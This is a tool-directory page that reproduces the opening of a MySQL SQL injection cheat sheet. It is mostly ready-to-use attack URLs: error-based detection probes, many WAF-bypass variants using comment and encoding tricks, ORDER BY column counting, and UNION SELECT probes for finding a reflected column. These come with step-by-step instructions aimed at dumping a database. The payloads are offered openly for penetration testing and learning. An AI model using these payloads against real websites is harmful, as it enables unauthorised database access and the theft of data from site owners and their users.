Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Advanced-SQL-Injection-Cheatsheet — A cheat sheet that contains advanced queries for SQL Injection of all types. | Kitploit
Tools/GitHubGitHub/kleiton0x00/advanced-sql-injection-cheatsheet
Vulnerability AnalysisWeb Application ExploitationWAF BypassWeb SecurityPenetration TestingLearning & EducationCurated Resources
GitHubkleiton0x00/advanced-sql-injection-cheatsheet

Advanced-SQL-Injection-Cheatsheet

A cheat sheet that contains advanced queries for SQL Injection of all types.

View RepositoryWebsite
3.2k702243 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

MySQL Error based SQL Injection Cheatsheet

This is probably the easiest vulnerability along the SQL Injection attack. An attacker can enumerate and dump the MySQL database by using the SQL error messages to his advantage.

Detecting the vulnerability

http://domain.com/index.php?id=1
Website loads successfully

http://domain.com/index.php?id=1'
Error message shows up: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near...

http://domain.com/index.php?id=1\'
Error message shows up: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near...

http://domain.com/index.php?id=1 and 0' order by 1--+
Website loads successfully

http://domain.com/index.php?id=2-1
Website loads successfully

http://domain.com/index.php?id=-1'
Error message shows up again

http://domain.com/index.php?id=-1)'
Error message shows up again

http://domain.com/index.php?id=1'-- -
Website might loads successfuly, but it might shows error also

http://domain.com/index.php?id=1'--
Website might loads successfuly, but it might shows error also

http://domain.com/index.php?id=1+--+
Website might loads successfuly, but it might shows error also

Bypassing WAF to detect the vulnerability (if the first methodology didn't work)

In some cases, WAF won't let you to cause errors on the website, so sending special queries might be needed to bypass WAF.

http://domain.com/index.php?id=1'--/**/-
If no WAF Warning is shown and website loads up, we confirm the vulnerability, else try the following payloads.

http//domain.com/index.php?id=/^.*1'--+-.*$/
http//domain.com/index.php?id=/*!500001'--+-*/
http//domain.com/index.php?id=1'--/**/-
http//domain.com/index.php?id=1'--/*--*/-
http//domain.com/index.php?id=1'--/*&a=*/-
http//domain.com/index.php?id=1'--/*1337*/-
http//domain.com/index.php?id=1'--/**_**/-
http//domain.com/index.php?id=1'--%0A-
http//domain.com/index.php?id=1'--%0b-
http//domain.com/index.php?id=1'--%0d%0A-
http//domain.com/index.php?id=1'--%23%0A-
http//domain.com/index.php?id=1'--%23foo%0D%0A-
http//domain.com/index.php?id=1'--%23foo*%2F*bar%0D%0A-
http//domain.com/index.php?id=1'--#qa%0A#%0A-
http//domain.com/index.php?id=/*!20000%0d%0a1'--+-*/
http//domain.com/index.php?id=/*!blobblobblob%0d%0a1'--+-*/

Find the number of columns using 'ORDER BY' query

Now that we performed an SQL syntax error to the website, we can begin fuzzing and finding how many columns do we have by using ORDER BY

http://domain.com/index.php?id=1' order by 1-- -
This query musn't shows up error, since there is no lower number than 1

  • If the payload shows up error, try setting a negative value:
    http://domain.com/index.php?id=-1' order by 1-- -
    This query musn't shows up error, since there is no lower number than 1

    • If the payload shows up error, try removing the quote which might cause SQL error: http://domain.com/index.php?id=605 order by 1-- -
      http://domain.com/index.php?id=-605 order by 1-- -
      These both queries musn't shows up error. If error is still ocurring, try the following payloads:

      • If both of payloads don't work, it is problably a WAF blocking it. Try the following blocks until you won't see WAF detection or SQL syntax error.
http://domain.com/index.php?id=1' order by 1 desc-- -  
http://domain.com/index.php?id=1' group by 1-- -  
http://domain.com/index.php?id=1' group by 1-- -  
http://domain.com/index.php?id=1' /**/ORDER/**/BY/**/ 1-- -  
http://domain.com/index.php?id=-1' /*!order*/+/*!by*/ 1-- -  
http://domain.com/index.php?id=1' /*!ORDER BY*/ 1-- -  
http://domain.com/index.php?id=1'/*!50000ORDER*//**//*!50000BY*/ 1-- -  
http://domain.com/index.php?id=1' /*!12345ORDER*/+/*!BY*/ 1-- -  
http://domain.com/index.php?id=1' /*!50000ORDER BY*/ 1-- -  
http://domain.com/index.php?id=1' order/**_**/by 1-- -  
http://domain.com/index.php?id=1\ order by 1-- -  
http://domain.com/index.php?id=1' order by 1 asc-- -  
http://domain.com/index.php?id=1' group by 1 asc-- -  
http://domain.com/index.php?id=1' AND 0 order by 1-- -  
http://domain.com/index.php?id=1%0Aorder%0Aby%0A1-- -  
http://domain.com/index.php?id=1%23%0Aorder%23%0Aby%23%0A1-- -  
http://domain.com/index.php?id=1%23aa%0Aorder%23aa%0Aby%23aa%0A1-- -  
http://domain.com/index.php?id=1%23xyz%0Aorder%23xyz%0Aby%23xyz%0A1-- -  
http://domain.com/index.php?id=1%23foo%0D%0Aorder%23foo%0D%0Aby%23foo%0D%0A1-- -  
http://domain.com/index.php?id=1%23foo*%2F*bar%0D%0Aorder%23foo*%2F*bar%0D%0Aby%23foo*%2F*bar%0D%0A1-- -  
http://domain.com/index.php?id=1/*!20000%0d%0a+order+by+*/1-- -  
http://domain.com/index.php?id=1/*!blobblobblob%0d%0a+order+by+*/1-- -  
http://domain.com/index.php?id=1/*!f****U%0d%0a+order+by+*/1-- -  
- If none of the payloads didn't bypass WAF, try again the payloads by following the 2 rules below:
  - Add a minus (-) before 1 (example: ```?id=-1' /**/ORDER/**/BY/**/ 1-- -```)  
  - Remove the quote (') after the parameter value (example: ```?id=1 /**/ORDER/**/BY/**/ 1-- -```)

In this case, the payload ?id=1 order by 1-- - worked and website loads successfuly. Now it is time to find the correct number of columns. Now let's use the payload that worked, and try increasing the number by 1, untill an error shows up:

http://domain.com/index.php?id=1 order by 1-- - no error
http://domain.com/index.php?id=1 order by 2-- - no error
http://domain.com/index.php?id=1 order by 3-- - no error
http://domain.com/index.php?id=1 order by 4-- - no error
http://domain.com/index.php?id=1 order by 5-- - error:
Unknown column '5' in 'order clause'Unknown column '5' in 'order clause'

This means there are only 4 columns. Now we have to find which one of these 4 columns have information.

Find the vulnerable column where information are stored using 'UNION SELECT' query

Using a simple query, we determine which of the 4 columns reflect our input using. Only 1 of these payloads will run without syntax error. NOTE: If none worked, try the same payloads, but remove the quote (') after number 1.

http://domain.com/index.php?id=1' Union Select 1,2,3,4-- -
http://domain.com/index.php?id=-1 Union Select 1,2,3,4-- -
http://domain.com/index.php?id=-1' Union Select 1,2,3,4-- -
http://domain.com/index.php?id=1'+UNION+ALL+SELECT+null,null,null,null--+-
http://domain.com/index.php?id=1' Union Select null,2,3,4-- -
http://domain.com/index.php?id=1' Union Select 1,null,3,4-- -
http://domain.com/index.php?id=1' Union Select 1,2,null,4-- -
http://domain.com/index.php?id=1' Union Select 1,2,3,null-- -
http://domain.com/index.php?id=.1' Union Select 1,2,3,4-- -
http://domain.com/index.php?id=-1' div 0' Union Select 1,2,3,4-- -
http://domain.com/index.php?id=1' Union Select 1,2,3,4 desc-- -
http://domain.com/index.php?id=1' AND 0 Union Select 1,2,3,4-- -

Website must successfully load and we will see a number (in our case between 1-4)

union_select_vuln_column

Download Tool